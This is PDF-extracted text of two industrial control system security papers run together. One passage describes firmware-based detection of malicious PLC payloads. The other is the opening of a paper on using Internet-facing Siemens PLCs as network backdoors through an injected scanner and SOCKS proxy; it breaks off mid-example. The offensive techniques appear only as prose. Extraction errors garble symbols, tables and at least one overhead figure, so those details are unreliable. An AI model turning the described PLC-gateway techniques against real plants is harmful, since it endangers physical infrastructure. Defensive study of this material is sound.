payload is downloaded to the PLC. In this paper, we assume that control system speci cations, such as the number of I/Os, functionality of each I/O pin, and possible ranges of I/O values, are available. Such speci ca- tions are usually provided by the control system engineering team that develops the legitimate payload program. Table I summarizes the control system speci cations required by our detection mechanism and the corresponding legitimate control system actions. For instance, when designing the legitimate payload, a digital output pin may be used to control a circuit breaker to trip. The engineering team knows whether a 0 or a 1 corresponds to the trip signal, so it is straight- forward to generate control system speci cations describing the functionality of this output pin. To implement control operation sequences (e.g., tripping a circuit breaker and then re-closing it), timers and counters are generally used. When the legitimate payload program is created, timers and counter must be properly con gured to control the temporal behaviors of the payload program. These con gurations can then be converted into timing relationships among I/O and network events. C. Payload Attack Detection at PLC Firmware Using control system speci cations, runtime behavior model of legitimate PLC payload program is established and stored in the PLC rmware. The timing relationships between inputs and outputs, the number of network packets generated after different control actions, as well as timing relationships between I/O and network events, are modeled. By modifying the PLC rmware, runtime behaviors of the payload program ............ Digital input terminals Digital output terminalsAnalog input terminalsAnalog output terminalsI:0/0 HIGH LOWManual reset energized Manual reset de-energized O:2/8 HIGH LOWEnergize circuit breaker (CB) trip coil De-energize CB trip coilO:3.0 12~15VCharge actuator battery I:1.0 0~3VActuator battery needs to be charged 12~15VActuator battery level is normalNetwork Port Packet counts (sending) Packet counts (receiving)1, 3 1Fig. 5. PLC wiring diagram with sample control system speci cations for I/O and network events. Note that wiring of I/O terminals is simpli ed (digital ground terminal as well as terminal pairs for each analog I/O are not shown). (e.g., I/O and network access patterns) are time-stamped and compared against the established runtime behavior model. In addition, a backup version of the output image table is separately stored by the rmware at the beginning of each program scan cycle. If a certain abnormal runtime behavior is detected, the backup output image table is loaded to overwrite the output generated by the payload. As a result, any output related to the detected abnormal runtime behavior will not affect the physical system. For PLC payload sending/receiving network packets, network requests are also blocked when a runtime behavior anomaly is detected by the rmware. IV. S YSTEM DESIGN A. PLC Payload Runtime Behavior Model Given the control system speci cations, it is possible to create a runtime behavior model for legitimate PLC payload. Suppose that we need to create control system speci cations for the PLC shown in Fig. 5. In this gure, sample speci - cations for I/O terminals and the network port is provided. We note that timing relationships are not shown in Fig. 5. The information categorized in Table I allows us to create the runtime behavior model as follows: First, the number of (analog and digital) I/Os and their feasible values are determined. For instance, for digital input I:0/0 in Fig. 5, its legitimate values are 1 and 0 . For analog input I:1.0 (note that the notation for analog I/Os is different from that for digital I/Os as mentioned in Sec. II-B), the legitimate value ranges are 03V and 1215V . In the PLC rmware, such information can be stored as a table (see Fig. 6 for an example), with each row storing the legitimate values/ranges of a particular pin. We call this table the I/O event table. Next, the number of network packets received or sent by the legitimate payload is extracted from the speci cations. Since PLC payload program is designed to control physical process, network packets are typically associated to speci c I/O conditions. For instance, when an alarm signal is energized to sound a horn, the same alarm signal is usually transmitted via a network packet to the HMI at the same time. When a process data request from the HMI is received, the PLC generates process data response(s) to transmit the requested2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. I/O Event Table I/O Event I:0/0 I:1.0 O:2/8 O:3.0... ... ... ...Legitimate Values/Ranges 1 (HIGH), 0 (LOW)... 0:3 (0~3V), 12:15 (12~15V) 1 (HIGH), 0 (LOW)... 12:15 (12~15V)... ... Network Event Table Network EventLegitimate Packet Counts receiving sending1 1, 3Timing Behavior Matrix Fig. 6. A sample runtime behavior model established based on control system speci cations in Fig.5. The model consists of two tables and a sparse matrix. data. In the PLC rmware, network event information can be stored as a table with two rows (see Fig. 6 for an example). The rst row lists the numbers of network packets that can be received, and the second row lists those that can be sent. We call this table the network event table. Using the I/O and network event tables, we are able to model the legitimate runtime behaviors of I/Os and network port(s) at any particular time instant. Then, timing relationships between inputs, outputs, and network accesses are established. To store these relationships, a sparse matrix is created in the PLC rmware (see Fig. 6 for an example). We call this sparse matrix the timing be- havior matrix. Both the rows and the columns of the matrix are indexed by legitimate I/O and network operations. For instance, the I:0/0:1 event in the matrix in Fig. 6 represents the I/O event where digital input pin I:0/0 is set to HIGH. Each column of the matrix represents a particular payload program action, whereas the rows with non-zero values represent its preconditions. For instance, the matrix in Fig. 6 indicates that there are four preconditions under which a network packet will be generated and sent by a legitimate PLC payload. Note that the non-zero value in the matrix represent the maximum time (in microseconds) within which a column event will occur. Once all information provided in the control system spec- i cations is converted into a runtime behavior model, three tables are stored into the PLC rmware (i.e., the I/O event table, the network event table, and the timing behavior matrix). These tables will only be updated if changes to the control system speci cations are made (e.g., additions of new sen- sors/actuators). When a PLC payload is downloaded to a PLC, the PLC rmware assumes that its runtime behaviors match the ones speci ed in the supplied control system speci cations. Any deviation from the encoded runtime behavior model will be regarded as an anomaly. B. Payload Attack Detection at PLC Firmware Our detection scheme introduces runtime behavior moni- toring into the PLC rmware and compares the runtime be- haviors of the currently deployed payload against the runtime behavior model established from control system speci cations. To implement the proposed detection scheme, the following modi cations to the PLC rmware are incorporated: 1) Logging Access to Input and Output Images: As intro- duced in Sec. II-A, input image is updated before each run ofthe payload program, and output image is updated after each run. In existing PLC rmware, I/O reads move values from the input/output image to a designated memory location. When an output pin is written, value stored in a memory location is moved to the output image table. To receive/send a packet, receive/transmit queue is either explicitly (via ladder logic in- struction) or implicitly (at the end of the housekeeping phase) queried. To monitor the I/O and network access patterns, we modify the implementation of PLC rmware to log the system time-stamp of these operations. This can be achieved by setting up the memory protection unit (MPU) to enter interrupt when the user program accesses the input/output images or the network queues. In existing PLC rmware, a separate system timer is typically supported. This timer provides the time- stamps for the I/O and network events to be monitored. If I/O images are accessed, the interrupt handler decodes the I/O pin address and log the time-stamp of the operation. Suppose that the same input pin is accessed multiple times during a single program scan cycle, only the time-stamp of the rst read operation is logged. For an output pin, both the rst read and the last write operations are time-stamped. For access to network queues, the number of packets received/sent is logged and time-stamped. Time-stamps of I/O and network operations are stored in a separate table (known as the runtime time- stamp table) in the PLC rmware. Each entry of the table corresponds to a particular I/O event (e.g., a legitimate I/O value is observed) or network event (e.g., a legitimate number of packets are sent). In our current implementation, the maximum number of time-stamps logged by the runtime time-stamp table is 10 for each I/O event. If more than 10 time-stamps are collected, newly generated time-stamps will be discarded. We log the time-stamp for the rst I/O read operation and last output operation within each program scan cycle because control system speci cations typically use the observation of an I/O value on the physical process as precondition. Take the output pin O:2/8 in Fig. 5 as an example. Even if the payload program operates on O:2/8 multiple times during a program scan cycle, it is the last value written into the output image that will actually take effect. For each legitimate network event, our current implementation logs a maximum of 20 time-stamps. Newly collected time-stamps will be discarded if there are already 20 time-stamps pending in the table. 2) Validating Runtime Behaviors: When time-stamping I/O and network events, any event that is not included in the I/O and network event tables is regarded as an abnormal runtime event. In addition, a separate sparse matrix (known as the runtime sparse matrix ) is created and maintained in the PLC rmware to keep track of the timing relationships at runtime. The sparse matrix is also updated in the MPU interrupt handler. Runtime behaviors speci ed in the timing behavior matrix are validated in the output scan phase before the values in the output image are transferred to external output terminals. If any of the preconditions speci ed by the runtime behavior model are met, the timing relationships are checked. If an event occurs but none of its preconditions are active, a runtime behavior anomaly is detected. Take the timing behavior matrix in Fig. 6 as an example. Suppose that during a program scan cycle, we observe two occurrences of the event2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. Send:1 . For the rst time-stamp of Send:1 , we check the all the time-stamps for its preconditions. If any of the timing relationships is met, the corresponding entry in the runtime sparse matrix is cleared. In the runtime time-stamp table, the oldest time-stamp for the corresponding precondition event is removed. If a violation of the timing relationship is detected, a runtime behavior anomaly is found and the execution of the payload program should be terminated. Then, for the second time-stamp of Send:1 , previously cleared precondition elds are set if the corresponding entries in runtime time-stamp table have pending time-stamps. The timing relationships for Send:1 are then validated again. 3) Backing Up the Output Image: At the beginning of each program scan cycle (i.e., in the input scan phase), a backup version of the output image table is separately stored by the PLC rmware. Values in this backup image are simply the output of the preceding program scan cycle. If runtime behavior anomaly is detected at the current program scan cycle, the backup image is used to overwrite the output image generated by the payload program. In this way, output values corresponding to illegitimate payload program behaviors are blocked. 4) Canceling Network Send/Receive Requests: There are two scenarios where network send/receive requests gener- ated by ladder logic instructions are processed: Network send/receive requests generated by a payload program are always processed in the housekeeping phase. To block these packets, we modify the rmware so that all pending network requests are cleared in the output scan phase if runtime be- havior anomaly is detected. Alternatively, a subset of network- related ladder logic instructions can request the PLC rmware to service pending network tasks immediately. To prevent such network access, the implementation of MPU interrupt handler is further modi ed to check the preconditions of requested network operations. Suppose that a network-related ladder logic instruction is executed, after the network requests are generated (e.g., four packets will be retrieved from the receive queue), the rmware rst enters the MPU interrupt handler and checks the preconditions of the requested network event. If any of the preconditions is met yet the corresponding timing relationship is violated, the network requests will not be executed because a runtime behavior anomaly is detected. It should be noted that our proposed detection scheme can easily be customized to notify ICS operators of the detection 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Number of analog outputs0510152025303540Maximum memory size (kB)unmodified firmware modified firmware Fig. 7. Maximum memory utilization of unmodi ed and modi ed PLC rmware running PLC payload programs with different numbers of utilized analog outputs.of PLC payload attacks. Suppose an on-site operator is to be noti ed, an extra output pin can be energized to set up an alarm during the output scan phase when runtime behaviors are examined. It is also possible to send out an alarm message to a remote HMI during this phase after the runtime behavior validation is done. V. E VALUATION We implement the proposed payload attack detection method on Texas Instruments TM4C12x ARMR CortexR - M4F core-based microcontrollers. Payload attacks are written in ladder logic, which are converted into machine code and loaded onto the PLC prototype. Hardware resources of the chosen microcontroller series are the currently active equiv- alents to the microcontrollers used by existing PLCs [6]. Memory protection unit (MPU) and system timer are avail- able to implement our proposed detection scheme. Runtime behavior data collected by the PLC rmware is read from a Universal Asynchronous Receiver/Transmitter (UART) mod- ule connected to a PC. We rst evaluate the overhead of implementing the proposed detection mechanism and then its detection performance. A. Memory Overhead Memory overhead of implementing the proposed detection method comes from both the rmware and payload levels. In the PLC rmware, runtime behavior model converted from control system speci cations needs to be stored. Extra tables and sparse matrix are required to time-stamp and keep track of the runtime behaviors of the currently deployed payload. The sizes of these matrices and tables will grow as the number of I/O and network events speci ed in the control system speci cations grows. In addition, interrupt handler for the MPU as well as initialization code for the system timer and MPU need to be added to the PLC rmware. In our prototype, these rmware modi cations translate to about 200 lines of assembly code (compared to the unmodi ed PLC rmware with about 6000 lines of assembly code). To evaluate whether the memory overhead of our pro- posed detection mechanism is acceptable, we create payload programs utilizing different numbers of I/Os and generating different numbers of network packets. Note that each of these payload programs generates two types of network events (i.e., 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Number of analog outputs05001000150020002500300035004000Maximum execution time ( s)unmodified firmware modified firmware Fig. 8. Maximum execution time of PLC programs with different numbers of utilized analog outputs. All payload programs are executed on both unmodi ed and modi ed PLC rmware.2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. Medium- or High-Voltage Bus Voltage and Current Sensors Circuit Breaker (CB) Primary Transformer Load 1Load 2Load 3Primary Transformer Protection PLC Feeder #1 Protection PLCFeeder #2 Protection PLCFeeder #3 Protection PLCPLC AFig. 9. Sample power substation protection system implemented by multiple PLCs. Note that our PLC prototype only emulates PLC A. sending two packets or receiving one packet within each pro- gram scan cycle) and utilizes 16 digital I/Os. The number of analog outputs utilized by these payload programs varies from 0 to 16. Each analog output has two legitimate value ranges. The timing relationships in the control system speci cations all describe preconditions for analog outputs. These payload programs are then loaded onto our PLC prototype twice: First, unmodi ed PLC rmware is used to execute the payload programs and the maximum sizes of the PLC rmware in the RAM are logged. Then, PLC rmware with our payload detection mechanism is used and the maximum rmware sizes are also recorded. Fig. 7 shows the memory overhead of implementing our PLC payload attack detection method in our PLC prototype. For a PLC system with 16 analog outputs, the memory overhead (compared to unmodi ed PLC rmware) is about 1 kB, which translates to a 3% increase in memory size. This memory overhead is acceptable for existing PLC systems on the market, which typically have more than 32 kB of memory [9]. B. Execution Time Overhead PLC payload program needs to satisfy execution time requirements in order to control physical process correctly. If a program scan cycle takes too long to complete, the PLC will not be able to track the changes of the physical process and generate control outputs timely. Since our payload detec- tion mechanism incorporates runtime behavior monitoring and validations in the PLC rmware, it is necessary the ensure that execution time of the program scan cycle does not signi cantly increase. TABLE II. A TTACK INSTANCES IMPLEMENTED ON PLC P ROTOTYPE Attack Instance Group Description Illegitimate analog in- puts (Group 1, 5 in- stances)Scaling factors of analog input modules are modi ed by attacker(s) to generate out-of-range input values. Illegitimate network events (Group 2, 5 instances)When trip coils are energized, the attack payload sends process data to multiple pre-speci ed destina- tions. When process data request is received, a packet containing intentionally modi ed process data is sent. Illegitimate I/O event timing (Group 3, 5 in- stances)Trip coils are not energized within 1000 s when a voltage/current fault is detected. Illegitimate network event timing (Group 4, 5 instances)Packet containing up-to-date process data is not sent within 500 s after process data request is received.TABLE III. A TTACK INSTANCES AND DETECTION RESULTS Group/ID 1 2 3 4 5 6 7 8 9 10 1/1 XXXXXXXXXX 1/2 XXXXXXXXXX 1/3 XXXXXXXXXX 1/4 XXXXXXXXXX 1/5 XXXXXXXXXX 2/1 XXXXXXXXXX 2/2 XXXXXX 2/3 XXXXXXXXXX 2/4 XXXXXXXXXX 2/5 XXXXXXXXXX 3/1 XXXXXXXXXX 3/2 XXXXXXXXXX 3/3 XXXXXXXXXX 3/4 XXXXXXXXXX 3/5 XXXXXXXXXX 4/1 XXXXXXXXXX 4/2 XXXXXXXXXX 4/3 XXXXXXXXXX 4/4 XXXXXXXXXX 4/5 XXXXXXXXXX To evaluate the execution time overhead of the proposed detection mechanism, we measure the execution time of the payload program instances created in Sec. V-A. Each payload program are executed for 1,000 program scan cycles on both unmodi ed and modi ed PLC rmware. Note that we added six extra assembly instructions in the PLC rmware to set up an extra output pin of the prototype PLC: At the beginning of each program scan cycle, this pin is set to HIGH. At the end of each program scan cycle, this pin is set to LOW. Fig. 8 shows the maximum execution time of the payload program instances. The average increase in maximum execution time is about 65 s, which is far above the typical execution time of PLC payload programs (e.g., 110 ms [9]). C. Detection Performance To evaluate the detection performance of our proposed method, our PLC prototype emulates PLC A shown in Fig. 9. To implement the protection tasks assumed by PLC A, four analog inputs and two digital outputs are utilized. Our control system speci cations require that both circuit breakers are tripped within 1000 s once a voltage/current fault is detected on either side of the transformer. In addition, when process data request (sent by a PC emulating an HMI) is received, a packet containing up-to-date current and voltage readings must be sent within 500 s. We create 20 different payload attack instances, which can be categorized into the four groups and are described in Table II. Each payload attack instance is executed for 10 times (each run consisting of 1,000 program scan cycles). Table III shows the detection results when running the payload attacks on the modi ed PLC rmware. 19 out of the 20 payload attack instances can always be detected during our evaluation, which shows that our proposed detection mechanism can help prevent PLC payload attacks without introducing external apparatus. One of the attack instances (Group 2, Instance 2) cannot always be detected. This attack instance either generates ille- gitimate outputs or transmits modi ed process data as network packets. When it sends network packets, it simply modi es the process data values stored in memory before they are encapsulated. The preconditions of network events are still2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. met and the timing relationships are not violated. Although this attack instance can sometimes evade our detection, it can be easily identi ed by existing detection methods against false data injection attacks [23]. VI. D ISCUSSION In this paper, we propose incorporating runtime behavior monitoring and establishing runtime behavior models from control system speci cations to detect PLC payload attacks. Although our evaluations show that it is feasible to implement our proposed method in existing PLC rmware and achieve good detection performance, we note that further enhance- ments to the proposed method are possible. For instance, it is possible to encode correlations between I/O events at certain time instants during the program scan cycle (e.g., by iden- tifying legitimate I/O combinations in the runtime behavior model). However, such an enhancement will require overly de- tailed control system speci cations. Control system engineers may not be aware of all the legitimate I/O combinations when creating the PLC payload program. Furthermore, the memory and execution time overhead of such an enhancement will also increase. Therefore, it remains to be further evaluated whether other runtime behavior speci cations should be included in our model. Our current implementation focuses on payload attack detection instead of mitigation. Although output and network packets related to abnormal control logic are blocked, the operations of the ICS may still be affected. As our future work, we will devise better mitigation strategies for ICS with different mitigation resources. VII. C ONCLUSION In this paper, we propose the detection of PLC payload attacks via runtime behavior monitoring in PLC rmware. Through modeling and monitoring the runtime behaviors, our proposed rmware enhancements can detect abnormal runtime behaviors of malicious payload. Using our proof-of-concept PLC prototype, we show that the proposed approach can identify a wide variety of PLC payload attacks revealed by prior research. In addition, our evaluations show that the ex- ecution time and memory overhead of the proposed detection mechanism are acceptable for existing PLC rmware. Our proposed approach complements existing bump-in-the-wire solutions in that it can detect payload attacks that violate real- time requirements of ICS operations. ACKNOWLEDGMENT This work is supported by the U.S. Department of Energy (DoE) under Award Number DE-OE0000779. REFERENCES [1] E. R. Alphonsus and M. O. Abdullah, A Review on the Applications of Programmable Logic Controllers (PLCs), Renewable and Sustainable Energy Reviews, vol. 60, no. Supplement C, pp. 1185 1205, July 2016. [2] D. Kushner, The Real Story of Stuxnet, IEEE Spectrum, vol. 50, no. 3, pp. 48 53, March 2013. [3] N. Falliere, L. O. Murchu, and E. Chien, W32. Stuxnet Dossier, White Paper, Symantec Corp., Security Response, vol. 5, no. 6, 2011.[4] N. Govil, A. Agrawal, and N. O. Tippenhauer, On Ladder Logic Bombs in Industrial Control Systems, arXiv:1702.05241 [cs.CR], February 2017. [5] S. McLaughlin and P. McDaniel, SABOT: Speci cation-Based Pay- load Generation for Programmable Logic Controllers, in Proceedings of the 2012 ACM Conference on Computer and Communications Security (CCS 12), 2012, pp. 439 449. [6] L. Garcia and S. A. Zonouz, Hey, My Malware Knows Physics! Attacking PLCs with Physical Model Aware Rootkit, in Proceedings of the 2017 Network and Distributed System Security Symposium (NDSS 17), 2017. [7] A. Rull an, Programmable Logic Controllers versus Personal Comput- ers for Process Control, Computers & Industrial Engineering, vol. 33, no. 1, pp. 421 424, October 1997. [8] Programmable Controllers - Part 3: Programming Languages, Inter- national Electrotechnical Commission (IEC), International Standard, February 2013. [9] F. Petruzella, Programmable Logic Controllers, 5th ed. New York, NY , USA: McGraw-Hill Education, 2017. [10] A. Abbasi and M. Hashemi, Ghost in the PLC: Designing an Un- detectable Programmable Logic Controller Rootkit via Pin Control Attack, in Black Hat Europe 16, November 2016, pp. 1 35. [11] L. Cojocar, K. Razavi, and H. Bos, Off-the-Shelf Embedded Devices as Platforms for Security Research, in Proceedings of the 10th Eu- ropean Workshop on Systems Security (EuroSec 17), April 2017, pp. 1:1 1:6. [12] J. O. Malchow, D. Marzin, J. Klick, R. Kovacs, and V . Roth, PLC Guard: A Practical Defense against Attacks on Cyber-Physical Sys- tems, in 2015 IEEE Conference on Communications and Network Security (CNS), September 2015, pp. 326 334. [13] H. Janicke, A. Nicholson, S. Webber, and A. Cau, Runtime-Monitoring for Industrial Control Systems, Electronics, vol. 4, no. 4, pp. 995 1017, December 2015. [14] S. E. McLaughlin, S. A. Zonouz, D. J. Pohly, and P. D. McDaniel, A Trusted Safety Veri er for Process Controller Code, in Proceedings of the 2014 Network and Distributed System Security Symposium (NDSS 14), 2014. [15] S. Zonouz, J. Rrushi, and S. McLaughlin, Detecting Industrial Control Malware Using Automated PLC Code Analytics, IEEE Security & Privacy, vol. 12, no. 6, pp. 40 47, November 2014. [16] O. Rossi and P. Schnoebelen, Formal Modeling of Timed Function Blocks for the Automatic Veri cation of Ladder Diagram Programs, inProceedings of the 4th International Conference on Automation of Mixed Processes - Hybrid Dynamic Systems (ADPM2000), 2000, pp. 177 182. [17] N. Delgado, A. Q. Gates, and S. Roach, A Taxonomy and Catalog of Tuntime Software-Fault Monitoring Tools, IEEE Transactions on Software Engineering, vol. 30, no. 12, pp. 859 872, December 2004. [18] Y . Ye, T. Li, D. Adjeroh, and S. S. Iyengar, A Survey on Malware De- tection Using Data Mining Techniques, ACM Comput. Surv., vol. 50, no. 3, pp. 41:1 41:40, October 2017. [19] S. Lu, M. Seo, and R. Lysecky, Timing-Based Anomaly Detection in Embedded Systems, in The 20th Asia and South Paci c Design Automation Conference, January 2015, pp. 809 814. [20] S. Dunlap, J. Butts, J. Lopez, M. Rice, and B. Mullins, Using Timing- Based Side Channels for Anomaly Detection in Industrial Control Systems, International Journal of Critical Infrastructure Protection, vol. 15, no. Supplement C, pp. 12 26, 2016. [21] X. Wang, C. Konstantinou, M. Maniatakos, R. Karri, S. Lee, P. Robison, P. Stergiou, and S. Kim, Malicious Firmware Detection with Hardware Performance Counters, IEEE Transactions on Multi-Scale Computing Systems, vol. 2, no. 3, pp. 160 173, July 2016. [22] R. Spenneberg, M. Br uggemann, and H. Schwartke, PLC-Blaster: A Worm Living Solely in the PLC, in Black Hat Asia 16, 2016. [23] R. Deng, G. Xiao, R. Lu, H. Liang, and A. V . Vasilakos, False Data Injection on State Estimation in Power Systems Attacks, Impacts, and Defense: A Survey, IEEE Transactions on Industrial Informatics, vol. 13, no. 2, pp. 411 423, April 2017.2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply.
Detecting Payload Attacks on Programmable Logic Controllers (PLCs) Huan Yang, Liang Chengy, and Mooi Choo Chuahz Department of Computer Science and Engineering, Lehigh University, Bethlehem, Pennsylvania 18015 E-mail:[email protected],[email protected],[email protected]
Internet-facing_PLCs_as_a_network_backdoor.pdf
Industrial control systems (ICS) are integral com ponents of production and control processes. Our modern infras tructure heavily relies on them. Unfortunately, from a security perspective, thousands of PLCs are deployed in an Internet-facing fashion. Security features are largely absent in PLCs. If they are present then they are often ignored or disabled because security is often at odds with operations. As a consequence, it is often possible to load arbitrary code onto an Internet-facing PLC. Besides being a grave problem in its own right, it is possible to leverage PLCs as network gateways into production networks and perhaps even the corporate IT network. In this paper, we analyze and discuss this threat vector and we demonstrate that exploiting it is feasible. For demonstration purposes, we developed a prototypical port scanner and a SOCKS proxy that runs in a PLC. The scanner and proxy are written in the PLC's native programming language, the Statement List (STL). Our implementation yields insights into what kinds of actions adversaries can perform easily and which actions are not easily implemented on a PLC. I. INTRO DUCT ION Industrial control systems (ICS) are integral components of production and control tasks. Modern infrastructure heavily relies on them. The introduction of the Smart Manufacturing (Industry 4.0) technology stack further increases the dependency on industrial control systems [1]. Modern infrastructure is already under attack and offers a broad attack surface, ranging from simple XSS vulnerabilities [2], [3] to major design flaws in protocols [4], [5]. The canonical example of an attack on an industrial control system is the infamous Stuxnet worm that targeted an Iranian uranium enrichment facility. However, adversaries increasingly target ordinary production systems [6]. A recent example is the forced shutdown of a blast furnace in a German steelworks in 2014. The attackers reportedly gained access to the pertinent control systems via the steelwork's business network [7]. This is a typical attack vector because business networks serve humans and humans are susceptible to spear phishing. Arguably , spear phishing is easy to carry out when ac companied with research and social engineering. However, in far too many cases, even easier ways exist into industrial control systems. Published scan data shows that thousands of ICS components, for example, programmable logic controllers (PLCs), are directly reachable from the Internet [8], [9], [10]. While only one PLC of a production facility may be reachable in this fashion, the PLC may connect to internal networks with many more PLCs. This is what we call the "deep" industrial network. In this paper, we investigate how adversaries can leverage exposed PLCs to extend their access from the Internet to the deep industrial network. 978-1-4673-7876-5/15/$31.00 2015 IEEE 524 The approach we take is to turn PLCs into gateways (we focus on Siemens PLCs). This is enabled by a notorious lack of proper means of authentication in PLCs. A knowledgeable adversary with access to a PLC can download and upload code to it, as long as the code consists of MC7 bytecode, which is the native form of PLC code. We explored the runtime environment of PLCs and found that it is possible to implement several network services using uploaded MC7 code. In particular, we implemented a SNMP scanner for Siemens PLCs, and a fully fledged SOCKS proxy for Siemens PLCs entirely in Statement List (STL), which compiles to MC7 byte code. Our scanner and proxy can be deployed on a PLC without service interruption to the original PLC program, which makes it unlikely that unsuspecting operators will notice the infection. In order to demonstrate and analyze deep industrial network intrusion, we developed a proof of concept tool called PLCinject. Based on our proof of concept, we analyzed whether the augmentation of the original code with our PLC mal ware led to measurable effects that might help detecting such augmentations. We looked at timing effects, specifically. We found that augmented code is distinguishable from unaugmented code, that is, statistically significant timing differences exist. The difference is minor in absolute terms, that is, the augmentation does not likely affect a production process and hence it will not be noticable unless network operators actively monitor for malicious access. The downside is that operators of industrial networks must include PLCs in their vulnerability assessment procedures and they must actively monitor internal networks for malicious network traffic that originates from their own PLCs. Moreover, adversaries can leverage our approach to attack a company's business network from the industrial network. This means that network administrators must guard their business networks from the front and the back. The remainder of this paper is organized as follows. We begin with a discussion of work related to ours in II. In III, we give technical background for readers unfamiliar wth industrial control systems. We describe our attack and intrusion methods in IV. In VI, we discuss mitigations and VII concludes the paper. II. RE LA TED WORK Various attacks on PLCs have been published. Most attacks target the operating systems of PLCs. In contrast we leverage the abilities of logic programs running on the PLCs. As such we do not use any unintended functionality. In the following, we compare our approach to well-known (code) releases and published attacks that manipulate logic code. One of the most Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) MES SCADA PLC In-IOutputsignals Manufacturing process Figure 1: Automation pyramid, adopted from [15] cited SCADA attack descriptions is Beresfords' 2011 Black Hat USA release [5]. He demonstrated how credentials can be extracted from remote memory dumps. In addition he shows how to start and stop PLCs through replay attacks. In contrast to our work he does not alter the logic program on the PLC. In 2011 Langner released "A timebomb with fourteen bytes" [11] wherein he describes how to inject rogue logic code into PLCs. He borrows the same code prepending technology as we do, from Stuxnet. He conceptualizes how to take control away from the original code. In contrast, our program runs in parallel to the original code with the goal to not interfere with the original code's execution. An attack similar to Langners' was presented at Black Hat USA 2013 by Meixell and Forner [12]. In their release they describe different ways of exploiting PLCs. Among those are ways to remove safety checks from logic code. Again, our approach differs as we add new functionality while preserving original functionality . To our best knowledge, the first academic paper on PLC mal ware was published by McLaughlin in 2011 [13]. In this work he proposes a basic mechanism for dynamic payload generation. He presents an approach based on symbolic execution that recovers boolean logic from PLC logic code. From this, he tries to determine unsafe states for the PLC and generates code to trigger one of these states. In 2012 McLaughlin published a followup paper [14], which extends his approach in a way that automatically maps the code to a predefined model by means of model checking. With his model, he can specify a desired behaviour and automatically generate attack code. In his work McLaughlin focuses on manipulating the control flow of a PLC. We, in contrast, use the PLC as a gateway to the network and leave its original functions untouched. III. IND USTRIAL CO NTROL SY STEM S Figure 1 illustrates the structure of a typical company that uses automation systems. Industrial control systems consist of several layers. At the top are enterprise resource planning (ERP) systems, which hold the data about currently available resources and production capacities. Manufacturing execution systems (MES) are able to manage multiple factories or plants and receives tasks from ERP systems. The systems below the MES are located in the factory. Supervision, control and data acquisition (SCADA) systems control production lines. They 525 Process ima ge of outputs (PIO) Time slices (1 ms each) Process ima ge of inpu ts m (PII) o m @) () User program Cycle control poin t (CCP) Operatin g syste m (OS) Figure 2: Overview of program execution, extracted from [17] provide data about the current production state and they provide means for intervention. The devices holding the logic for production processes are called programmable logic controllers (PLC). We explain them in more detail in section III-A. Human machine interfaces (HMI) display the current progress and allow operators to interact with the production process. A. PLC Hardware A PLC consists of a central processing unit (CPU) which is attached to a number of digital and analog inputs and outputs. A PLC program stored on the integrated memory or on a external Multi Media Card (MMC) defines how the inputs and outputs are controlled. A special feature of a PLC is the guaranty of a defined executions time to control time critical processes. For communication or special purpose applications the functionality of a CPU can be extended with modules. The Siemens S7- 314C-2 PNIDP we use in our experiments has 24 digital inputs, 16 digital outputs, 5 analog inputs, 2 analog outputs and a MMC slot. It is equipped with 192 KByte of internal memory, 64 KByte can be used for permanent storage. Additionally, the PLC has one RS485 and two RJ45 sockets [16]. B. PLC Execution Environment Siemens PLCs run a real time operating system (OS), which initiates the cycle time monitoring. Afterwards the OS cycles through four steps (see figure 2). In the first step the CPU copies the values of the process image of outputs to the output modules. In the second step the CPU reads the status of the input modules and updates the process image of input values. In the third step the user program is executed in time slices with a duration of 1 ms. Each time slice is divided into three parts, which are executed sequentially: The operating system, the user program and the communication. The number of time slices depends on the current user program. By default the time should be not longer than 150 ms. An engineer can configure a different value. If the defined time expires, an interrupt routine is called. In the common case the CPU returns to the start of the cycle and restarts the cycle time monitoring [17]. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) C. Software Siemens provides their Total Integrated Automation (TIA) portal software to engineers for the purpose of developing PLC programs. It consists of two main components. The STEP7 as development environment for PLCs and WinCC to configure HMls. Engineers are able to program PLC in Ladder Diagram (LAD), Function Block Diagram (FBD), structured control language (SCL) and Statement List (STL). In contrast to the text-based SCL and assembler-like STL the LAD and FBD languages are graphical. PLC programs are divided into units of organization blocks (OB), functions (FC), function blocks (FB), data blocks (DB), system functions (SFC), system function blocks (SFB) and system data blocks (SDB). OBs, FCs and FBs contain the actual code while DBs provide storage for data structures and SDBs current PLC configurations. For internal data storage addressing the prefix M for memory is used. D. PLC Programs A PLC program consists of at least one organization block called OBI , which is comparable to the main function in a traditional C program. It will be called by the operating system. There exist more organization blocks for special purposes, for example, OB 100. This block is called once when the PLC starts and is used usually for the initialization of the system. Engineers can encapsulate code by using functions and function blocks. The only difference is an additional DB as a parameter to calling a FE. The SFCs and SFBs are built into the PLC. The code can not be inspected. The STEP7 software knows which SFCs and SFBs are available based on hardware configuration steps. The following examples give an overview of the the programming languages SCL, LAD and STL. Each example shows the same configuration of three inputs and one output. First, the CPU performs a logical AND operation of inputs o . 0 and O. 1. Next, it calculates a logical OR operation of the outcome and the input 0 . 2. The result is written to output o 0 which sets the logical values to the connected wire in the next cycle. The first example represents the described program in STL. This is done in four lines of assembler-like instructions. Each line defines one instruction. A %10.0 2 A %10 .1 3 0 %10 .2 = o/cQO.O The next example shows the same program in the text-based language SCL. This program can be expressed in one line. I, o/cQO.O := (% 1 